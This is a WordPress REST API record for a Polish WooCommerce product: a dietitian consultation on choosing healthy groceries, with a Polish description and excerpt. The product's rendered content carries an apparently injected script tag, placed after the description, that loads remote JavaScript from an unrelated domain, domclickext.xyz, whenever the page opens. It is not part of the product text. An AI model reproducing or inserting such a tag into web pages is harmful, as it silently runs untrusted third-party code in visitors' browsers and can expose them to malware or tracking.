{"id":1530,"date":"2018-07-24T14:25:42","date_gmt":"2018-07-24T12:25:42","guid":{"rendered":"https:\/\/spozywo.pl\/produkt\/import-placeholder-for-1758\/"},"modified":"2020-03-24T09:36:54","modified_gmt":"2020-03-24T08:36:54","slug":"zakupy-z-dietetykiem","status":"publish","type":"product","link":"https:\/\/spozywo.org\/?product=zakupy-z-dietetykiem","title":{"rendered":"Zakupy z dietetykiem"},"content":{"rendered":"<h2>Informacje o pakietach<\/h2>\n<p><span style=\"font-weight: 400;\">Czy wiesz, jak robi\u0107 zdrowe zakupy? Je\u015bli nie, to mo\u017cemy w tym pom\u00f3c. Wybierz sklep, w kt\u00f3rym najcz\u0119\u015bciej kupujesz. Dietetyk zaproponuje szczeg\u00f3\u0142ow\u0105 list\u0119 zakup\u00f3w oraz szereg porad, dzi\u0119ki kt\u00f3rym kupisz zdrow\u0105 \u017cywno\u015b\u0107 do zjedzenia na bie\u017c\u0105co lub tak\u0105 z d\u0142ugim terminem przydatno\u015bci, kt\u00f3r\u0105 mo\u017cesz przechowywa\u0107 w formie zapas\u00f3w.<\/span><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"font-weight: 400;\">Konsultacja przeznaczona dla os\u00f3b, kt\u00f3re chc\u0105 m\u0105drze robi\u0107 zakupy i wybiera\u0107 w sklepie warto\u015bciowe produkty. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Dietetyk stworzy zestaw polecanych produkt\u00f3w z wybranego sklepu online. Udzieli wskaz\u00f3wek, jak czyta\u0107 sk\u0142ady, kt\u00f3re dodatki do \u017cywno\u015bci s\u0105 nieszkodliwe, a kt\u00f3rych lepiej unika\u0107, a tak\u017ce jakie s\u0105 zdrowsze zamienniki popularnych produkt\u00f3w. Pomo\u017ce stworzy\u0107 list\u0119 warto\u015bciowych zakup\u00f3w i zdradzi triki na sprytne kupowanie.<\/span><\/p>\n","protected":false},"featured_media":1592,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[],"product_tag":[],"class_list":{"0":"post-1530","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","7":"first","8":"instock","9":"shipping-taxable","10":"purchasable","11":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/spozywo.org\/index.php?rest_route=\/wp\/v2\/product\/1530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/spozywo.org\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/spozywo.org\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/spozywo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/spozywo.org\/index.php?rest_route=\/wp\/v2\/media\/1592"}],"wp:attachment":[{"href":"https:\/\/spozywo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1530"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/spozywo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=1530"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/spozywo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=1530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}